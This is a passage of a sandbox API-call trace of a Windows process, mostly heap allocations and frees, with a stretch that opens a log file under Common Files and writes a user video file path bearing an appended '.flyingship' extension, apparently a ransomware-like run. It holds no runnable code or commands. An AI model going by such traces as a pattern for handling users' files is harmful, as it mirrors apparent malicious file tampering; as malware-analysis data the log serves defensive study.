(HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0196.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0196.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0196.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0196.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0196.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0196.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0196.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0196.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0196.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0196.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0196.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0196.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0196.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0196.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0196.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0196.076] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0196.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0196.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0196.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0196.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0196.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0196.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0196.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0196.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0196.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0196.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0196.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0196.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0196.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0196.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0196.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0196.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0196.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9058 [0196.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0196.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0196.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0196.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0196.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0196.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0196.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0196.077] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0196.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0196.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0196.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0196.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0196.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0196.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0196.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0196.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0196.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0196.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0196.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0196.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0196.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0196.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0196.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0196.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0196.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0196.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0196.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0196.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0196.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0196.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0196.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0196.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0196.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0196.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0196.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0196.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0196.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0196.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0196.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0196.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0196.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0196.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x170) returned 0x907778 [0196.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0196.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0196.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0196.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0196.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0196.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0196.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0196.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0196.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0196.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0196.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0196.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0196.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0196.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0196.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0196.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0196.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0196.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0196.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbca008 [0196.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0196.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0196.080] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0196.080] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.080] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0196.080] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.080] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0196.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0196.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0196.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0196.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0196.081] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0196.081] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x3789, lpOverlapped=0x0) returned 1 [0196.081] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0196.081] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x3789, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.082] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0196.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0196.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0196.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0196.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0196.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.flyingship.mp4\r\n", cchWideChar=95, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 95 [0196.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x5f) returned 0x9a5d10 [0196.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.flyingship.mp4\r\n", cchWideChar=95, lpMultiByteStr=0x9a5d10, cbMultiByte=95, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.flyingship.mp4\r\n", lpUsedDefaultChar=0x0) returned 95 [0196.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0196.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5de0 [0196.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0196.082] WriteFile (in: hFile=0x160, lpBuffer=0x9a5de0*, nNumberOfBytesToWrite=0x5e, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9a5de0*, lpNumberOfBytesWritten=0x87f43c*=0x5e, lpOverlapped=0x0) returned 1 [0196.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5de0 | out: hHeap=0x8a0000) returned 1 [0196.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0196.083] CloseHandle (hObject=0x160) returned 1 [0196.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0196.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0196.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0196.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0196.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0196.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0196.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0196.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0196.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0196.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0196.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0196.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0196.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0196.084] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0196.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0196.084] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0196.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0196.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0196.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0196.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0196.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0196.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6e48 | out: hHeap=0x8a0000) returned 1 [0196.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0196.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0196.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0196.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0196.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0196.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0196.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0196.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0196.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0196.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0196.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0196.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0196.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0196.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0196.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0196.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0196.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0196.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0196.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0196.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0196.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0196.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0196.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0196.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0196.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0196.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0196.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0196.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0196.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0196.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0196.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0196.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0196.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0196.114] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0196.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0196.114] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0196.120] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0196.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0196.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0196.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0196.129] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0196.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0196.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0196.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0196.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1ad0 [0196.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0196.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0196.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0196.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0196.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0196.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0196.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0196.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba3f0 [0196.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0196.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0196.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0196.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0196.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0196.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0196.137] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0196.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0196.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0196.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0196.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0196.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0196.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0196.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0196.140] RtlAllocateHeap 